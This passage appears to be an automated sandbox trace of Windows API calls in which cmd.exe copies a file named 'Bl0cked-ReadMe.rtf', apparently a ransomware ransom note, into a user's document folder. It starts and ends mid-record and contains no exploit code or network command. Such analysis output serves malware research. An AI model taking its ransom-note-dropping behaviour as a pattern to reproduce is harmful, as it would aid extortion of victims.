lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.945] RegCloseKey (hKey=0x40) returned 0x0 [0234.945] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.945] srand (_Seed=0x5b8863c2) [0234.945] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0234.945] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0234.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.945] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.945] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 
0x0 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.945] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.945] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.945] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.945] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.946] GetEnvironmentStringsW () returned 0x442308* [0234.946] FreeEnvironmentStringsW (penv=0x442308) returned 1 [0234.946] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.946] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.946] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.946] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.946] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.946] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.946] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.946] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7d8, lpFilePart=0x2cf7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7d4*="Desktop") returned 
0x18 [0234.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.946] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.946] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.947] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.947] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.947] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.947] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.947] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.947] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.947] GetEnvironmentStringsW () returned 0x442b28* [0234.947] FreeEnvironmentStringsW (penv=0x442b28) returned 1 [0234.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.947] GetConsoleOutputCP () returned 0x1b5 [0234.948] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.948] GetUserDefaultLCID () returned 0x409 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf918, cchData=128 | out: lpLCData="0") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf918, cchData=128 | out: lpLCData="0") returned 2 [0234.948] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf918, cchData=128 | out: lpLCData="1") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.948] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.949] GetConsoleTitleW (in: lpConsoleTitle=0x430908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.949] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.950] _wcsicmp (_String1="type", _String2=")") 
returned 75 [0234.950] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.950] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.950] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.950] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.950] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.950] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] GetFileType (hFile=0x7) returned 0x2 [0234.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf810 | out: lpMode=0x2cf810) returned 1 [0234.954] _dup (_FileHandle=1) returned 3 [0234.955] _close (_FileHandle=1) returned 0 [0234.955] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.955] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf7e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.955] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.955] GetConsoleTitleW (in: lpConsoleTitle=0x2cf610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.955] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.955] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.955] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.955] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 
0x18 [0234.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf174) returned 0x430eb8 [0234.956] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.956] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.957] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce080, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.957] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] GetFileType (hFile=0x54) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce0d8 | out: lpFileSizeHigh=0x2ce0d8*=0x0) returned 0x1632 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0234.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.957] GetFileType (hFile=0x4c) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.957] GetFileType (hFile=0x4c) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0234.957] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.959] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] GetFileType (hFile=0x4c) returned 0x1 [0234.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.960] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=4) returned 0x54 
[0235.364] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.364] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] GetFileType (hFile=0x4c) returned 0x1 [0235.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.364] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.365] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.365] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] GetFileType (hFile=0x4c) returned 0x1 [0235.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.365] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0235.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.366] GetFileType (hFile=0x4c) returned 0x1 [0235.366] _get_osfhandle (_FileHandle=1) returned 
